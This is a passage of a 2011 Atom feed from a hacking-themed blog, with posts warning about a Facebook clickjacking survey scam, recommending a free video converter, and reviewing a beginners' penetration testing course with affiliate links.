href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=MI8dd-6Q5Es:0ConvXxDaFo:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=MI8dd-6Q5Es:0ConvXxDaFo:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=MI8dd-6Q5Es:0ConvXxDaFo:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=MI8dd-6Q5Es:0ConvXxDaFo:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/MI8dd-6Q5Es" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8344827735353612395/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/how-to-spy-on-android-phones.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8344827735353612395?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8344827735353612395?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/MI8dd-6Q5Es/how-to-spy-on-android-phones.html" title="How To Spy On Android Phones – Spy That Phone App Review [Android]" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-quCjTYVqR5E/Tuug7ZsSfKI/AAAAAAAABmc/ND6OphetWmM/s72-c/spying-cellphone.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/how-to-spy-on-android-phones.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0QESXkyeip7ImA9WhRQF0Q.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4459695972822556055</id><published>2011-12-13T07:48:00.000-08:00</published><updated>2011-12-13T07:48:28.792-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-13T07:48:28.792-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="facebook" /><title>Beware! Facebook Scam "Yeahh!! It happens on Live Television!"</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ij9GurUqsYQ/Tudzt3JJUaI/AAAAAAAABmU/P9liz0KU6j4/s1600/facebook_scams.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://4.bp.blogspot.com/-ij9GurUqsYQ/Tudzt3JJUaI/AAAAAAAABmU/P9liz0KU6j4/s320/facebook_scams.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
we recently covered about a &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/12/beware-new-picture-worm-hits-facebook.html"&gt;facebook worm&lt;/a&gt;&lt;/b&gt; which targeted a whole lot of facebook users. It's really sad to see that these types of scams keep growing and facebook hasn't really been able to successfully give protection to their users from such scams. &lt;br /&gt;
&lt;br /&gt;
A new bloke in the list "Yeahh!! It happens on Live Television!", the most viral one yet, is spreading like a wildfire among facebook users. &lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
The following status on one of my friend's wall bought my attention first towards this scam:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-sXoR2C0yuJI/TuZaNiFn9qI/AAAAAAAABmE/9bex8ypUHpg/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-sXoR2C0yuJI/TuZaNiFn9qI/AAAAAAAABmE/9bex8ypUHpg/s1600/Untitled.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;Yeahh!! It happens on Live Television![LINK]&amp;nbsp;&lt;/blockquote&gt;&lt;blockquote class="tr_bq"&gt;Lol Checkout this video its very embracing moment for her&lt;/blockquote&gt;The lady is the above screen shot is Marika Fruscio an Italian Model, She had&amp;nbsp;Wardrobe malfunction &lt;b&gt;(Accidental exposure of intimate parts) &lt;/b&gt;on a live TV show, which is what the scam refers to.&lt;br /&gt;
&lt;br /&gt;
On clicking the link, Facebook users are directed to the folllowing page:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-zW6hQR0ip_g/TuZY6Gkl0gI/AAAAAAAABl8/LMKDZgzcETw/s1600/facebook-live-tv-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-zW6hQR0ip_g/TuZY6Gkl0gI/AAAAAAAABl8/LMKDZgzcETw/s1600/facebook-live-tv-1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
In order to play the video the user has to click the button&lt;b&gt; "jaa", w&lt;/b&gt;hich appears as an age verification system required in order to watch the video. when you click on "&lt;b&gt;jaa" &lt;/b&gt;you are infact clicking on a hidden link which consequently post the same link on each of your contact's wall. Next a survey is prompted which the user needs fill in order to watch the video, thus helping the scammers make tons of money.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-JTbUdCDaXmg/TuZcUEa3FpI/AAAAAAAABmM/329zD1A7DzE/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-JTbUdCDaXmg/TuZcUEa3FpI/AAAAAAAABmM/329zD1A7DzE/s1600/Untitled.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;While searching related to the scam on the internet, I managed to find the source code of the scam on pastebin, This proves that there is not a single body behind this scam, with the source code available in public, any one could create a website and inject the malicious javascript in to it and start scamming.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;b&gt;http://pastebin.com/8y4X2hxj&lt;/b&gt;&lt;/blockquote&gt;One more thing to note is that in most such cases blogspot blogs are being targeted as they are free to create, You can create a blog in less than 5 minutes. If this keeps growing, I believe that blogger will stop giving free blogspot blogs and will maybe switch to a payed system or facebook would just disable blogspot domains from being shared, thus making it difficult for real bloggers to market their blogs.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How To Remove The Scam?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
It's fairly easy to remove the scam, all you need to do is to report it to facebook.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-4459695972822556055?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=W90fVH5rjgI:r43Sdy86w_w:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=W90fVH5rjgI:r43Sdy86w_w:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=W90fVH5rjgI:r43Sdy86w_w:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=W90fVH5rjgI:r43Sdy86w_w:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=W90fVH5rjgI:r43Sdy86w_w:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=W90fVH5rjgI:r43Sdy86w_w:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=W90fVH5rjgI:r43Sdy86w_w:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=W90fVH5rjgI:r43Sdy86w_w:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=W90fVH5rjgI:r43Sdy86w_w:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=W90fVH5rjgI:r43Sdy86w_w:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=W90fVH5rjgI:r43Sdy86w_w:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/W90fVH5rjgI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4459695972822556055/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/beware-facebook-scam-yeahh-it-happens.html#comment-form" title="9 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4459695972822556055?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4459695972822556055?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/W90fVH5rjgI/beware-facebook-scam-yeahh-it-happens.html" title="Beware! Facebook Scam &quot;Yeahh!! It happens on Live Television!&quot;" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-ij9GurUqsYQ/Tudzt3JJUaI/AAAAAAAABmU/P9liz0KU6j4/s72-c/facebook_scams.jpg" height="72" width="72" /><thr:total>9</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/beware-facebook-scam-yeahh-it-happens.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0ENR3w6eSp7ImA9WhRXGE8.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-5074562125887436409</id><published>2011-12-08T05:44:00.000-08:00</published><updated>2011-12-25T06:01:36.211-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-25T06:01:36.211-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Others" /><title>Download Free Video Converter Hamster</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-RkNIOTrHKGM/TvcsPoCmPDI/AAAAAAAABnQ/9tLZ6KaWWYY/s1600/hamster-free-video-converter-8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="469" src="http://3.bp.blogspot.com/-RkNIOTrHKGM/TvcsPoCmPDI/AAAAAAAABnQ/9tLZ6KaWWYY/s640/hamster-free-video-converter-8.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Every day I get questions asked related to recommendations for free video converters. However due to increase in number of Paid Video converters, People deeply confuse whether to go with a paid one of a free one. The answer is that if there are tons of video converters available for free, why should we go for a paid one. One of those free video converters is my favorite Hamster.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Hamster Free Video Converter is a new video converter that turns video conversions into fun. It supports 3GP, MP4, MP3, MPEG, AVI, FLV, WMV, XviD, DivX, MKV, M2TS and etc (40+). Now you may easily convert video for any DVD player, iPod, iPhone, iPad, Archos, Zune, PSP, PS3, xBox, iRiver, HTC, Blackberry or Nokia in 3 clicks (supports 200+ devices)&lt;br /&gt;
&lt;br /&gt;
&lt;object style="height: 390px; width: 577px;"&gt;&lt;param name="movie" value="http://www.youtube.com/v/HOVSVKv4nmE?version=3&amp;feature=player_embedded"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/HOVSVKv4nmE?version=3&amp;feature=player_embedded" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="577" height="360"&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Download Free Video Converter Hamster &lt;b&gt;&lt;a href="https://market.android.com/details?id=com.avast.android.mobilesecurity" rel="no follow"&gt;here&lt;/a&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-5074562125887436409?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=bgvkgEcogpY:swOmTronKDs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=bgvkgEcogpY:swOmTronKDs:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=bgvkgEcogpY:swOmTronKDs:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=bgvkgEcogpY:swOmTronKDs:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=bgvkgEcogpY:swOmTronKDs:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=bgvkgEcogpY:swOmTronKDs:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=bgvkgEcogpY:swOmTronKDs:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=bgvkgEcogpY:swOmTronKDs:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=bgvkgEcogpY:swOmTronKDs:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=bgvkgEcogpY:swOmTronKDs:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=bgvkgEcogpY:swOmTronKDs:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/bgvkgEcogpY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/5074562125887436409/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/12/download-free-video-converter-hamster.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/5074562125887436409?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/5074562125887436409?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/bgvkgEcogpY/download-free-video-converter-hamster.html" title="Download Free Video Converter Hamster" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-RkNIOTrHKGM/TvcsPoCmPDI/AAAAAAAABnQ/9tLZ6KaWWYY/s72-c/hamster-free-video-converter-8.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/12/download-free-video-converter-hamster.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0UNQ346cCp7ImA9WhRRGEQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4864899737554424927</id><published>2011-12-02T06:32:00.000-08:00</published><updated>2011-12-03T00:01:32.018-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-03T00:01:32.018-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Security Training" /><title>Elearn Security Beginners Course For Penetration Testers</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.plimus.com/jsp/redirect.jsp?contractId=2968540&amp;amp;referrer=707446"&gt;&lt;img border="0" height="266" src="http://2.bp.blogspot.com/-YTOjX3jJDYk/TtPuOQKVMvI/AAAAAAAABj0/24_4PvxDn7k/s320/336x280-stud.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
There are thousands and thousands of people who want to become a penetration testers and Ethical hackers but most of them become after spending some time researching these topics get frustrated&amp;nbsp;and quit,&amp;nbsp;&amp;nbsp;And I don't blame them for being frustrated as there is no proper information and guidance available on the internet and if there is some it is presented in the wrong way to the beginners.&lt;br /&gt;
&lt;br /&gt;
When I started got interested in this field at the age of &lt;b&gt;"14"&lt;/b&gt;, there were no proper information available on the internet, Most of them were not available for Intermediates and were mostly&amp;nbsp;targeted&amp;nbsp;towards those who already have prior knowledge of Hacking and Penetration testing.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;All the stuff I learned was by trial and error, Experimenting and experimenting and experimenting, As I reason of which went I managed to understand the inns and outs of this field, I wrote a book "&lt;b&gt;&lt;a href="http://hacking-book.com/"&gt;A beginners Guide To Ethical Hacking&lt;/a&gt;&lt;/b&gt;" for beginners only, &amp;nbsp;but it was more focused towards Ethical hacking rather then penetration testing.&lt;br /&gt;
&lt;br /&gt;
Now a days Penetration testing is getting more focused and has got much more hype then Ethical hacking due to the&amp;nbsp;tremendous&amp;nbsp;amount of job opportunities. As a result of which there are several hundred's of people offering online&amp;nbsp;training's to the newbie's.&amp;nbsp;Recently I came across a wonderful course &lt;b&gt;"Penetration testing - Student"&lt;/b&gt; by Elearnsecurity, The content outline was enough to impress me. So I contacted the CEO&lt;b&gt; "Mr. Armando"&lt;/b&gt;, I told him that your course is something which my readers would be really interested in. So therefore today I am reviewing &lt;b&gt;"Penetration testing - Student"&lt;/b&gt; course by Elearn Academy. People note that the review is fully unbiased and is based on my personal opinion.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;b&gt;Editors Overall Rating:&lt;/b&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;8/10&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;b&gt;Presentation:&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #6aa84f;"&gt; &lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;9/10&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;b&gt;Content:&lt;/b&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;8/10&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Course:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
The whole course is comprised of 647 slides and the course is divided in to two main sections:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-8za07tO9ibI/TtISh9Xeh6I/AAAAAAAABjU/nAotiocMiDk/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="453" src="http://1.bp.blogspot.com/-8za07tO9ibI/TtISh9Xeh6I/AAAAAAAABjU/nAotiocMiDk/s640/1.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&amp;nbsp;Preliminary&amp;nbsp;Section&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;2. Penetration Testing&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Preliminary Section:&lt;/b&gt;&lt;/h4&gt;The preliminary section is for absolute beginners, who have very little or no knowledge related to Ethical hacking and Penetration testing, The Preliminary section is furthur more divided in to two sections.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. Networking&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. Webapplication&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Networking:&lt;/b&gt;&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-6g2oHML4DMI/TtPseXMw8rI/AAAAAAAABjs/FPVnfkaeBgY/s1600/networking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="423" src="http://1.bp.blogspot.com/-6g2oHML4DMI/TtPseXMw8rI/AAAAAAAABjs/FPVnfkaeBgY/s640/networking.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
I have stressed lots of times in my previous articles related to the importance of networking, because in order to understand Layer 3 attacks i.e Network based attacks, You need to understand &lt;b&gt;how networks work?&lt;/b&gt;. You need to understand how the network infrastructure is setup. Before understanding how to compromise the networks.&lt;br /&gt;
&lt;br /&gt;
The second of section talks about the basics of webapplication security and attacks. Since past 3 or 4 years, The attacks have been more directed towards webapplication more than networks, And it makes sense, Because networks are more difficult to compromise than Webapplication themselves. The section talks about basics of HTTP protocol, which is the foundation of the webapplication, The instructor also talks about Cookies, Sessions and same origin policy which is really essential for understanding attacks like XSS (Cross Site Scripting) and &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/07/facebook-cookie-stealing-and-session.html"&gt;Session Hijacking&lt;/a&gt;&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
I believe that the Instructor has did a very great job in explaining the&amp;nbsp;preliminary&amp;nbsp;section, However I would have liked more if the instructor would have gone in much more depth of networking section.&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Penetration Testing Section:&lt;/b&gt;&lt;/h4&gt;Penetration testing section talks about the methodology of penetration testing more than the tools of Penetration testing, The section talks about both Network based penetration testing and Webapplication based penetration testing, But the instructor did not go in to much depth as I was expecting. The section talks about several attacks webapplication attacks such as XSS, SQL Injection and buffer overflow. However the section did not talk about other high risk vulnerabilities like LFI, RFI, Directory transversals etc.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-srz1jCKXHwg/TtITW2upcdI/AAAAAAAABjc/ToPUomOlmYI/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="398" src="http://4.bp.blogspot.com/-srz1jCKXHwg/TtITW2upcdI/AAAAAAAABjc/ToPUomOlmYI/s640/Untitled.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Labs:&lt;/b&gt;&lt;/h4&gt;For the Beginner course, eLearnSecurity provides two Labs solutions.&amp;nbsp;The first is included in the package and is based on Metasploitable distro. Students are guided through the set-up of the lab&amp;nbsp;environment and will be able test acquired skill on this freely available vulnerable virtual machine.&lt;br /&gt;
&lt;br /&gt;
The second option is to add Coliseum Lab to the package. This is an online virtual lab on&amp;nbsp;web application security where the student is give 14 different real world scenarios and valuable&amp;nbsp;educational material during the lab. This further 100% hands on module costs $99 for 30 days access.&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Presentation:&lt;/b&gt;&lt;/h4&gt;The thing which I liked the most about the course is the presentation, The slides were presented in a superb way combined with flash based videos and other useful material. At the end of every topic there was a small quiz, which helped you test how much you have&amp;nbsp;understood&amp;nbsp;from the section.&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Overall&lt;/b&gt;&lt;/h4&gt;Overall the course was excellent for beginners and is highly recommended, It's not recommended for intermediates or those who have prior knowledge of Penetration testing.&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;Cost:&lt;/b&gt;&lt;/h4&gt;The whole course costs about $349. Which is a very reasonable price as compared to other security related&amp;nbsp;&lt;b&gt;training companies&lt;/b&gt;. You can enroll your self for &lt;b&gt;7 days risk free trial,&lt;/b&gt; So if at the end of the day, You feel that this is not for me, They will refund your every single penny. &amp;nbsp;You can enroll your self by clicking at the link mentioned below:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;a href="http://www.plimus.com/jsp/redirect.jsp?contractId=2968540&amp;amp;referrer=707446"&gt;&lt;span class="Apple-style-span" style="color: #a46f38; font-size: large;"&gt;Click Here To Visit The Official Page For More Information&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-4864899737554424927?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=WNzy56q3FYo:wJebj3njcVk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=WNzy56q3FYo:wJebj3njcVk:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=WNzy56q3FYo:wJebj3njcVk:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=WNzy56q3FYo:wJebj3njcVk:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=WNzy56q3FYo:wJebj3njcVk:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=WNzy56q3FYo:wJebj3njcVk:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=WNzy56q3FYo:wJebj3njcVk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a 